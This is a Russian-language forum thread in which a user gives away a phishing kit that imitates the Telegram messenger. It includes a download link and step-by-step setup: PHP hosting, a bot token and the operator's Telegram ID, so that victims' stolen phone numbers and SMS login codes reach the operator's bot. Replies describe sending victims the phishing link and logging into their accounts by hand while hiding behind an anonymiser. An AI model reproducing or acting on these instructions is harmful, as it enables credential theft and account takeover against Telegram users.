Загрузка...

****** мессенджера Telegram

Тема в разделе Скрипты сайтов создана пользователем Pouya_inactive4042452 12 июл 2021. 3599 просмотров

Загрузка...
  1. Pouya_inactive4042452
    Pouya_inactive4042452 Автор темы 12 июл 2021 Заблокирован(а) 243 29 мар 2021
    Хочу представить вам скрипт ******а мессенджера Telegram, в последнее время замечал у форумчан такое желание, в торговой ветке данный скрипт продается ценой от 500 до 1000 рублей, я же написал данный код для вас бесплатно для безвозмездного пользования.

Код скрипта полностью прокомментирован и даже человек который не разбирается в программирование на языке PHP поймет схему работы скрипта, все украденные данные идут лично к Вам в сообщения Telegram от созданного Вами бота.

Как установить ?
    1. Загрузить все файлы из архива на хостинг с поддержкой PHP в директорию public_html
    2. Настроить файл crydollar.php - какие переменные настраивать прокомментировано в самом файле.
    3. Обязательно создать бота в BotFather и узнать свой @myidbot айди телеграм для того чтобы настроить файл crydollarphp

Скачать:
    https://disk.yandex.ru/d/GOpsiMFiRZmwMg
    (virustotal не нужен так как файл не исполняемый на компьютере)

12 июл 2021 Изменено
  2. chopopo
    chopopo 12 июл 2021 по ночам моя любовь считает мёртвых воробьёв 191 16 янв 2021
    Годная штука

1. Pouya_inactive4042452 Автор темы
      chopopo, В нужных руках - однозначно да.
  3. Kanade
    Когда челик вводит свой номер и код я получаю файлы tdata или как это работает?

Kanade, Файлы tdata возможно получить только если человек установит *******. Вам необходимо установить скрипт на хостинг и выслать человеку ******овую ссылку - человек введет номер телефона и смс которое ему придет, ручным vбивом вы входите в его аккаунт в телеграме на любом своем устройстве. Не забывайте пользоваться ***.
  4. Robertino
    Robertino 12 июл 2021 ~ / I_FUCK_THIS_SOCIETY \ ~ 86 28 фев 2017
    Куда приходят данные? ( номер и код )

Robertino, Забыл данный момент упомянуть, все данные приходят к вам в телеграм чат с ботом. В файле crydollar.php нужно будет указать токен вашего бота и ваш телеграм айди.